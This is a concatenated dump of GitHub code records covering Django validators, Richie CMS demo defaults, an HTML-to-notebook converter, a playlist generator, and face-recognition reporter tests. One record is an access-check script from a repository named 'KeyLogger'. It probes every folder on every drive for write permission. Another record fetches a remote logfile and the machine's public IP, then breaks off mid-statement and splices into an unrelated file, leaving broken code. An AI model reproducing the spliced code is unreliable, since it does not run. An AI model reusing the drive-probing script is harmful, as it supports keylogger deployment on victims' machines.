\"FlatPage\")\n if FlatPage is not None:\n try:\n FlatPage.objects.get(url=value)\n except FlatPage.DoesNotExist:\n self.is_local_url = True\n else:\n return\n raise ValidationError(_('The URL \"%s\" does not exist') % value)\n else:\n self.is_local_url = True\n\n def validate_local_url(self, value):\n value = self.clean_url(value)\n # If we have i18n pattern in the URLconf, by default it will be\n # resolved against default language by `LocaleRegexURLResolver`. In\n # this case, it won't resolve the path /de/catalogue/ when default\n # language code is \"en-gb\" and so that path validation won't pass,\n # which is incorrect. In order to work it around, we extract language\n # code from URL and override current locale within the locale prefix of\n # the URL.\n urlconf = get_urlconf()\n i18n_patterns_used, _ = is_language_prefix_patterns_used(urlconf)\n redefined_language = None\n if i18n_patterns_used:\n language = get_language_from_path(value)\n current_language = get_language()\n if language != current_language:\n redefined_language = language\n if redefined_language:\n with override(redefined_language):\n self._validate_url(value)\n else:\n self._validate_url(value)\n\n def clean_url(self, value):\n \"\"\"\n Ensure url has a preceding slash and no query string\n \"\"\"\n if value != \"/\":\n value = \"/\" + value.lstrip(\"/\")\n q_index = value.find(\"?\")\n if q_index > 0:\n value = value[:q_index]\n return value\n\n\nclass URLDoesNotExistValidator(ExtendedURLValidator):\n def __call__(self, value):\n \"\"\"\n Validate that the URL does not already exist.\n\n The URL will be verified first and raises ``ValidationError`` when\n it is invalid. A valid URL is checked for existence and raises\n ``ValidationError`` if the URL already exists.\n\n This validation uses two calls to ExtendedURLValidator which can\n be slow. Be aware of this, when you use it.\n\n Returns ``None`` if URL is valid and does not exist.\n \"\"\"\n try:\n self.validate_local_url(value)\n except ValidationError:\n # Page exists - that is what we want\n return\n raise ValidationError(_(\"Specified page already exists!\"), code=\"invalid\")\n\n\ndef non_whitespace(value):\n stripped = value.strip()\n if not stripped:\n raise ValidationError(_(\"This field is required\"))\n return stripped\n\n\ndef non_python_keyword(value):\n if keyword.iskeyword(value):\n raise ValidationError(_(\"This field is invalid as its value is forbidden\"))\n return value\n","repo_name":"django-oscar/django-oscar","sub_path":"src/oscar/core/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"38928212241","text":"import urllib\nimport wget\nimport socket\nimport os\n\nurl = \"http://thearchmage.moe/logfile.txt\"\n\nmy_ip = urllib.urlopen('http://ip.42.pl/raw').read()\n\nf = urllib.urlopen(url)\n\nline = f.readline()\niframetxt = \"\"\nwhile line:\n if \"Welcome to Richie\"\"\"\n \"\"\"

It works! This is the default homepage for the Richie CMS.

\"\"\"\n ),\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_template\": \"richie/section/section.html\",\n \"blogposts_title\": \"Last news\",\n \"blogposts_button_title\": \"More news\",\n \"courses_title\": \"Popular courses\",\n \"courses_button_title\": \"More courses\",\n \"organizations_title\": \"Universities\",\n \"organizations_button_title\": \"More universities\",\n \"persons_title\": \"Persons\",\n \"persons_button_title\": \"More persons\",\n \"programs_title\": \"Programs\",\n \"programs_button_title\": \"More programs\",\n \"subjects_title\": \"Subjects\",\n \"subjects_button_title\": \"More subjects\",\n },\n \"fr\": {\n \"banner_title\": \"Bienvenue sur Richie\",\n \"banner_content\": (\n \"\"\"

Bienvenue sur Richie

\"\"\"\n \"\"\"

Ça marche ! Ceci est la page d'accueil par défaut du CMS Richie.

\"\"\"\n ),\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_template\": \"richie/section/section.html\",\n \"blogposts_title\": \"Actualités récentes\",\n \"blogposts_button_title\": \"Plus d'actualités\",\n \"courses_title\": \"Cours à la une\",\n \"courses_button_title\": \"Plus de cours\",\n \"organizations_title\": \"Universités\",\n \"organizations_button_title\": \"Plus d'universités\",\n \"subjects_title\": \"Thématiques\",\n \"subjects_button_title\": \"Plus de thématiques\",\n \"persons_title\": \"Personnes\",\n \"persons_button_title\": \"Plus de personnes\",\n \"programs_title\": \"Parcours\",\n \"programs_button_title\": \"Plus de parcours\",\n },\n}\nHOMEPAGE_CONTENT.update(getattr(settings, \"RICHIE_DEMO_HOMEPAGE_CONTENT\", {}))\n\nSINGLECOLUMN_CONTENT = {\n \"en\": {\n \"banner_title\": \"Single column template sample\",\n \"banner_content\": \"It works! This is a single column page.\",\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_sample_title\": \"A sample section\",\n \"section_sample_button_title\": \"More!\",\n \"section_sample_template\": \"richie/section/section.html\",\n },\n \"fr\": {\n \"banner_title\": \"Exemple de template avec une colonne unique\",\n \"banner_content\": \"Ça marche ! Ceci est une page d'une colonne.\",\n \"banner_template\": \"richie/large_banner/hero-intro.html\",\n \"button_template_name\": \"button-caesura\",\n \"section_sample_title\": \"Une section d'exemple\",\n \"section_sample_button_title\": \"Plus !\",\n \"section_sample_template\": \"richie/section/section.html\",\n },\n}\nSINGLECOLUMN_CONTENT.update(getattr(settings, \"RICHIE_DEMO_SINGLECOLUMN_CONTENT\", {}))\n\nFOOTER_CONTENT = {\n \"en\": [\n {\"name\": \"About\", \"internal_link\": \"annex__about\"},\n {\"name\": \"Sitemap\", \"internal_link\": \"annex__sitemap\"},\n {\"name\": \"Style guide\", \"external_link\": \"/styleguide/\"},\n {\n \"title\": \"Richie community\",\n \"items\": [\n {\"name\": \"Website\", \"external_link\": \"https://richie.education\"},\n {\n \"name\": \"Github\",\n \"external_link\": \"https://github.com/openfun/richie\",\n },\n {\n \"name\": \"Site factory\",\n \"external_link\": \"https://github.com/openfun/richie-site-factory\",\n },\n {\n \"name\": \"Example site\",\n \"external_link\": \"https://www.fun-campus.fr\",\n },\n ],\n },\n ],\n \"fr\": [\n {\"name\": \"A propos\", \"internal_link\": \"annex__about\"},\n {\"name\": \"Plan du site\", \"internal_link\": \"annex__sitemap\"},\n {\"name\": \"Style guide\", \"external_link\": \"/styleguide/\"},\n {\n \"title\": \"Communauté Richie\",\n \"items\": [\n {\"name\": \"Site web\", \"external_link\": \"https://richie.education\"},\n {\n \"name\": \"Github\",\n \"external_link\": \"https://github.com/openfun/richie\",\n },\n {\n \"name\": \"Usine à sites\",\n \"external_link\": \"https://github.com/openfun/richie-site-factory\",\n },\n {\n \"name\": \"Site exemple\",\n \"external_link\": \"https://www.fun-campus.fr\",\n },\n ],\n },\n ],\n}\nFOOTER_CONTENT.update(getattr(settings, \"RICHIE_DEMO_FOOTER_CONTENT\", {}))\n\nCOURSE_CONTENT = {\n \"en\": {\"partners_title\": \"Partners\", \"sponsors_title\": \"Sponsors\"},\n \"fr\": {\"partners_title\": \"Partenaires\", \"sponsors_title\": \"Sponsors\"},\n}\nCOURSE_CONTENT.update(getattr(settings, \"RICHIE_DEMO_COURSE_CONTENT\", {}))\n\nSITEMAP_PAGE_PARAMS = {\n \"blogposts\": {\"max_depth\": 1},\n \"courses\": {\"max_depth\": 1},\n \"categories\": {},\n \"organizations\": {\"max_depth\": 1},\n \"persons\": {\"max_depth\": 1},\n \"programs\": {\"max_depth\": 1},\n \"annex\": {\"include_root_page\": False},\n}\n","repo_name":"openfun/richie","sub_path":"src/richie/apps/demo/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":16133,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"72623080427","text":"#!/usr/bin/python\n# html2ipynb\n\nimport sys\nimport re\n\ndef download_file(URL=None):\n import httplib2\n h = httplib2.Http(\".cache\")\n resp, content = h.request(URL, \"GET\")\n return content\n\ndef extract_cells(html):\n r = re.compile(r\"((?:' : \"``` python\\n\", '' : \"```\",\n '' : '`', '' : '`'}\n substrs = sorted(replacements, key=len, reverse=True)\n regexp = re.compile('|'.join(map(re.escape, substrs)))\n html = regexp.sub(lambda match: replacements[match.group(0)], html)\n imgregexp = re.compile(r'(())', re.DOTALL) \n html = imgregexp.sub(r'\\1\\n\\2'+base_url+r'/\\3\\4 alt=\"\\3\" \\5', html)\n return html\n\ndef create_ipynb(cells):\n import json\n all = [\"{ \\\"cells\\\" : [\\n\"]\n for c in cells:\n all.append('{ \"cell_type\": \"markdown\", \"metadata\": {}, \"source\": [ ')\n all.append(json.dumps(c))\n all.append(\" ] }\")\n all.append(\",\\n\")\n all[-1] = \"\\n],\"\n all.append(\"\"\" \n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\", \"language\": \"python\", \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": { \"name\": \"ipython\", \"version\": 3 },\n \"file_extension\": \".py\", \"mimetype\": \"text/x-python\",\n \"name\": \"python\", \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\", \"version\": \"3.6.1\"\n }\n },\n \"nbformat\": 4, \"nbformat_minor\": 2\n }\"\"\") \n return \"\".join(all)\n\ndef save_notebook(file_path, notebook_content):\n f = open(file_path, \"wb\")\n f.write(notebook_content.encode(\"utf-8\", errors=\"ignore\"))\n f.close()\n\ndef main():\n if len(sys.argv) < 2:\n print(\"usage: html2ipynb.py url [outfile]\")\n url = sys.argv[1]\n out = \"\"\n base_url, name = url.rsplit('/', 1)\n if len(sys.argv) == 2:\n out = name + \".ipynb\"\n else:\n out = sys.argv[2]\n if not out.endswith(\".ipynb\"):\n out += \".ipynb\"\n\n html = download_file(url)\n html = html.decode(\"UTF-8\", errors=\"ignore\")\n raw_cells = extract_cells(html)\n refined_cells = [refine_cell(c, base_url) for c in raw_cells]\n ipynb = create_ipynb(refined_cells)\n save_notebook(out, ipynb)\n\n print('\"'+url+'\" converted to \"'+out+'\"')\n\nmain()\n","repo_name":"Ivan1248/scripts","sub_path":"html2ipynb.py","file_name":"html2ipynb.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31540735085","text":"import os\ndisks = ['%s:' % d for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists('%s:' % d)]\ndef check(disk):\n\tprint(disk + \"\\\\:\")\n\tfiles = os.listdir(disk + \"\\\\\")\n\tfor line in files:\n\t\tif(os.path.isdir(disk + \"\\\\\" + line)):\n\t\t\ttry:\n\t\t\t\tos.mkdir(disk + \"\\\\\" + line + \"\\\\Test\")\n\t\t\t\tprint(line + \" : True\")\n\t\t\t\tos.rmdir(disk + \"\\\\\" + line + \"\\\\Test\")\n\t\t\texcept:\n\t\t\t\tprint(line + \" : False\")\nfor disk in disks:\n\tcheck(disk)\n\ninput(\"Введите что-нибудь, чтобы выйти\")\n","repo_name":"Egor5555565/KeyLogger","sub_path":"Exe/CheckAccess/Compile/CheckAccess.py","file_name":"CheckAccess.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29790443545","text":"import numpy as np \nimport pandas as pd \n\ndf = pd.DataFrame({'y_test': [1,1,0,0,0,0,0,0,0,1,1,1,1,1],\n 'preds_test': [0.8,0.7,0.4,0.3,0.2,0.5,0.6,0.7,0.8,0.1,0.2,0.3,0.4,0],\n 'category': ['TP','TP','TN','TN','TN','FP','FP','FP','FP','FN','FN','FN','FN','FN']\n })\n\ny = df['y_test']\npred = df['preds_test']\n\ndef get_true_pos(y, pred, th=0.5):\n TP = 0\n thresholded_preds = pred >= th\n print(thresholded_preds)\n TP = np.sum((y == 1) & (thresholded_preds == 1))\n #print(TP)\n\n\n\nget_true_pos(y = y, pred=pred, th=0.5)","repo_name":"ShanthaKumarR/Chest_X_ray_Diagnoisis","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19703750637","text":"class LinkedList:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef removeDuplicatesFromLinkedList(linkedList):\n curr = linkedList\n\n while curr.next:\n if curr.value == curr.next.value:\n curr.next = curr.next.next\n else:\n curr = curr.next\n return linkedList\n","repo_name":"aivandes/algoexpert_solutions","sub_path":"Remove_Duplicates_From_Linked_List.py","file_name":"Remove_Duplicates_From_Linked_List.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3553211221","text":"import os\nimport json\nimport sys\n\nimport includes\n\ndef writePlaylist(dstPath, fileList):\n if not isinstance(fileList, list):\n return False\n\n if not os.path.exists(dstPath):\n return False\n\n i = 0\n rootDict = {}\n\n print('length fileList = {}'.format(len(fileList)))\n for item in fileList:\n\n itemDict = {}\n itemDict['path'] = item\n itemDict['name'] = os.path.basename(item)\n itemDict['post'] = \"\"\n itemDict['pre'] = \"\"\n itemDict['start'] = 0\n itemDict['end'] = 0\n\n rootDict[i]=itemDict\n\n i = i + 1\n\n #convert dict to json\n tmp = json.dumps(rootDict, indent=4, sort_keys=False)\n\n with open(os.path.join(dstPath, 'playlist.json'), \"w\") as f:\n f.write(tmp)\n\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print('please specify media file diretory and destination directory...')\n sys.exit(0)\n\n dir = sys.argv[1]\n if not os.path.isdir(dir):\n print('specified source path is not a directory...')\n sys.exit(0)\n\n dirDest = sys.argv[2]\n if not os.path.isdir(dirDest):\n print('specified destination path is not a directory...')\n sys.exit(0)\n\n files = os.listdir(dir)\n\n videoFormats = tuple(includes.config['video']['types'].split(','))\n audioFormats = tuple(includes.config['audio']['types'].split(','))\n\n playlistFiles = []\n for file in files:\n path = os.path.join(dir, file)\n if os.path.isfile(path):\n print(file)\n if path.lower().endswith(videoFormats) or path.lower().endswith(audioFormats):\n playlistFiles.append(path)\n\n writePlaylist(dirDest, playlistFiles)\n","repo_name":"thomaskhub/pi-player","sub_path":"playlist_generator.py","file_name":"playlist_generator.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20996567232","text":"import json\nimport os\n\nfrom django.contrib.gis.geos import MultiPolygon, Polygon\nfrom django.core.cache import cache\nfrom django.core.management import BaseCommand\n\nfrom common.models import Region, Country\nfrom locust.settings import BASE_DIR\n\n\ndef regions():\n try:\n regions = json.load(open(os.path.join(BASE_DIR, 'regions.json')))\n uzb = Country.objects.get(alpha_two_code='UZ')\n for region in regions['features']:\n polygons = []\n for i in region['geometry']['coordinates']:\n polygons.append(Polygon(i[0]))\n try:\n instance = Region.objects.get(pk=region['id'])\n instance.country = uzb\n instance.name_uz = region['name_uz']\n instance.name_en = region['name_en']\n instance.name_ru = region['name_ru']\n instance.geometry = MultiPolygon(polygons)\n instance.save()\n print(f'{instance.name_uz} is successfully updated.')\n except:\n instance = Region.objects.create(\n id=region['id'],\n country=uzb,\n name_uz=region['name_uz'],\n name_en=region['name_en'],\n name_ru=region['name_ru'],\n geometry=MultiPolygon(polygons),\n )\n print(f'{instance.name_uz} is successfully created.')\n except Exception as e:\n print(e)\n\n\nclass Command(BaseCommand):\n help = 'It will seed database automatically with initial data'\n\n def handle(self, *args, **options):\n regions()\n # cache.clear()\n","repo_name":"Abdulrakhmon/locust","sub_path":"apps/common/management/commands/db_crud.py","file_name":"db_crud.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71073726508","text":"from io import BytesIO\nfrom itertools import chain\nfrom time import sleep\nfrom zipfile import ZipFile\n\nfrom tests.system_tests import fsmRequests\nfrom tests.system_tests.base_test_class import BaseTest\nfrom tests.system_tests.config import USE_LATEX, FSM2_API_VERSION\nfrom tests.system_tests.test_data_option import *\n\n\nclass ReporterTest(BaseTest):\n name = 'test_visionlabs_reporter'\n events = []\n handlers = []\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.listDescriptors = reply.body['list_id']\n cls.listsToDelete += [cls.listDescriptors]\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.listPersons = reply.body['list_id']\n cls.listsToDelete += [cls.listPersons]\n\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.outputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.body\n cls.outputListPersons = reply.body['list_id']\n\n # create persons\n for personImgs in personsImgs:\n # create person\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n # link to persons list\n reply = cls.lunaClient.linkListToPerson(pId, cls.listPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n for img in personImgs:\n # extract descriptor\n reply = cls.lunaClient.extractDescriptors(filename=img)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n # link to descriptors list\n reply = cls.lunaClient.linkListToDescriptor(dId, cls.listDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # link to person\n reply = cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n handlers = [\n {\n \"name\": cls.name,\n \"type\": \"extract\",\n 'multiple_faces_policy': 1,\n \"extract_policy\": {\n \"estimate_attributes\": ea,\n },\n \"grouping_policy\": {\n \"ttl\": 10,\n \"grouper\": 2,\n \"threshold\": 0.9,\n },\n \"descriptor_policy\": {\n \"attach_policy\": [{\n \"list_id\": cls.outputListDescriptors\n }]\n },\n \"person_policy\": {\n \"create_person_policy\": {\n \"create_person\": 1,\n \"attach_policy\": [{\n \"list_id\": cls.outputListPersons\n }]\n }\n }\n } for ea in range(2)\n ]\n\n for handler_type, handler in enumerate(handlers):\n reply = fsmRequests.createHandler(handler)\n assert reply.statusCode == 201, reply.json\n cls.handlers.append(reply.json['handler_id'])\n\n for img in events:\n reply = fsmRequests.emitEvent(\n cls.handlers[handler_type],\n img,\n {\n 'user_data': cls.name,\n 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'\n }\n )\n assert reply.statusCode == 201, reply.json\n cls.events.append(reply.json['events'][0])\n sleep(10) # wait group ttl\n\n object_types = ('descriptors', 'persons', 'events', 'groups', 'events_attributes', 'groups_attributes')\n\n cross_matcher_tasks = [\n {\n \"description\": cls.name,\n \"references\": references,\n \"candidates\": {\"list_id\": list_id},\n }\n for references in [\n {\n \"objects\": 'luna_list',\n \"filters\": {\"list_id\": cls.outputListDescriptors},\n },\n {\n \"objects\": 'luna_list',\n \"filters\": {\"list_id\": cls.outputListPersons},\n },\n {\n \"objects\": 'events',\n \"filters\": {\"handler_ids\": [cls.handlers[0]]},\n },\n {\n \"objects\": 'groups',\n \"filters\": {\"handler_ids\": [cls.handlers[0]]},\n },\n {\n \"objects\": 'events',\n \"filters\": {\"handler_ids\": [cls.handlers[1]]},\n },\n {\n \"objects\": 'groups',\n \"filters\": {\"handler_ids\": [cls.handlers[1]]},\n },\n ]\n for list_id in (cls.listDescriptors, cls.listPersons)\n ]\n\n replies = [fsmRequests.createTaskCrossMatcher(task) for task in cross_matcher_tasks]\n for reply in replies:\n assert reply.statusCode == 202, reply.json\n cls.cross_match_task_ids = dict(zip(\n (\n x + '_to_' + y\n for x in object_types\n for y in object_types[:2]\n ),\n (reply.json['task_id'] for reply in replies)\n ))\n\n clusterizer_tasks = [\n {\n \"description\": cls.name,\n \"objects\": \"luna_list\",\n \"filters\": {\n \"list_id\": list_id\n }\n }\n for list_id in (cls.outputListDescriptors, cls.outputListPersons)\n ] + [\n {\n \"description\": cls.name,\n \"objects\": objects,\n \"filters\": {\n \"handler_ids\": [handler]\n }\n }\n for handler in cls.handlers\n for objects in (\"events\", \"groups\")\n ]\n\n replies = [fsmRequests.createTaskClusterization(task) for task in clusterizer_tasks]\n for reply in replies:\n assert reply.statusCode == 202, reply.json\n cls.clusterizer_task_ids = dict(zip(\n object_types,\n (reply.json['task_id'] for reply in replies)\n ))\n\n # create failed task\n reply = fsmRequests.createTaskClusterization(\n {\"objects\": \"events\", \"filters\": {\"handler_ids\": [str(uuid4())]}, \"description\": cls.name})\n assert reply.statusCode == 202, reply.json\n cls.fail_task_id = reply.json['task_id']\n\n # wait tasks ready\n cls.wait_tasks_ready([*cls.cross_match_task_ids.values(), *cls.clusterizer_task_ids.values(), cls.fail_task_id])\n\n def assertCSVReport(self, task_id, attributes_enabled=0):\n # todo add attributes check\n reply = fsmRequests.getReport(task_id)\n self.assertEqual(reply.status_code, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.headers['Content-Type'], 'application/zip', reply.json)\n with ZipFile(BytesIO(reply.content)) as zipfile:\n with zipfile.open('{}.csv'.format(task_id)) as CSVfile:\n # get photos\n text = CSVfile.read().decode()\n table = [line.split(',') for line in text.split('\\n')]\n photoCols = [i for i in range(len(table[0])) if 'Photo Name' in table[0][i]]\n photos = [line[i] for line in table[1:] for i in range(len(line)) if i in photoCols]\n attributesCols = [i for i in range(len(table[0])) if 'Reference Age' in table[0][i] or 'Reference Gender' in table[0][i]]\n attributes = [line[i] for line in table[1:] for i in range(len(line)) if i in attributesCols]\n # assert all photos exists\n self.assertEqual(len(set(photos)) + 1, len(zipfile.filelist), \"Wrong count of files in zipfile\")\n for photo in photos:\n self.assertIn('portraits/{}'.format(photos[0]), [file.filename for file in zipfile.filelist],\n 'Portrait \"{}\" is not in filelist'.format(photo))\n for attr in attributes:\n if attributes_enabled:\n self.assertTrue(attr.isdigit(), attributes)\n else:\n self.assertEqual(attr, 'None', attributes)\n\n def assertPDFReport(self, task_id):\n reply = fsmRequests.getReport(task_id)\n self.assertEqual(reply.status_code, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.headers['Content-Type'], 'application/pdf', reply.json)\n\n def test_cross_match_descriptors_to_descriptors_csv(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_descriptors_to_persons_csv(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_persons_to_descriptors_csv(self):\n cross_match_task_id = self.cross_match_task_ids['persons_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_persons_to_persons_csv(self):\n cross_match_task_id = self.cross_match_task_ids['persons_to_persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_events_to_descriptors_csv(self):\n for attributes in range(1, 2):\n task_name = {0: 'events_to_descriptors', 1: 'events_attributes_to_descriptors'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_events_to_persons_csv(self):\n for attributes in range(2):\n task_name = {0: 'events_to_persons', 1: 'events_attributes_to_persons'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_groups_to_descriptors_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups_to_descriptors', 1: 'groups_attributes_to_descriptors'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_cross_match_groups_to_persons_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups_to_persons', 1: 'groups_attributes_to_persons'}[attributes]\n with self.subTest(task_name):\n cross_match_task_id = self.cross_match_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n # todo @skipIf(not USE_LATEX, \"Latex disabled\")\n def test_cross_match_descriptors_to_descriptors_pdf(self):\n if not USE_LATEX:\n return\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"pdf\", \"parameters\": {\n \"colors_bounds\": {\"red\": 0.8, \"orange\": 0.4, \"green\": 0.0}\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertPDFReport(task_id)\n\n def test_clusterization_descriptors_csv(self):\n clusterization_task_id = self.clusterizer_task_ids['descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_clusterization_persons_csv(self):\n clusterization_task_id = self.clusterizer_task_ids['persons']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id)\n\n def test_clusterization_events_csv(self):\n for attributes in range(2):\n task_name = {0: 'events', 1: 'events_attributes'}[attributes]\n with self.subTest(task_name):\n clusterization_task_id = self.clusterizer_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id, attributes)\n\n def test_clusterization_groups_csv(self):\n for attributes in range(2):\n task_name = {0: 'groups', 1: 'groups_attributes'}[attributes]\n with self.subTest(task_name):\n clusterization_task_id = self.clusterizer_task_ids[task_name]\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"csv\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertCSVReport(task_id, attributes)\n\n # todo @skipIf(not USE_LATEX, \"Latex disabled\")\n def test_clusterization_descriptors_pdf(self):\n if not USE_LATEX:\n return\n clusterization_task_id = self.clusterizer_task_ids['descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": clusterization_task_id, \"format\": \"pdf\", \"parameters\": {\n \"colors_bounds\": {\"red\": 0.8, \"orange\": 0.4, \"green\": .0}\n }, \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n self.assertPDFReport(task_id)\n\n def test_nonexistent_task_id(self):\n primary_task_id = max(self.clusterizer_task_ids.values()) + 100\n reply = fsmRequests.createTaskReporter({\"task_id\": primary_task_id, \"format\": \"csv\", \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0],\n {'error_code': 13010, 'detail': 'No task found by id'})\n\n def test_failed_task_id(self):\n primary_task_id = self.fail_task_id\n reply = fsmRequests.createTaskReporter({\"task_id\": primary_task_id, \"format\": \"csv\", \"description\": self.name})\n 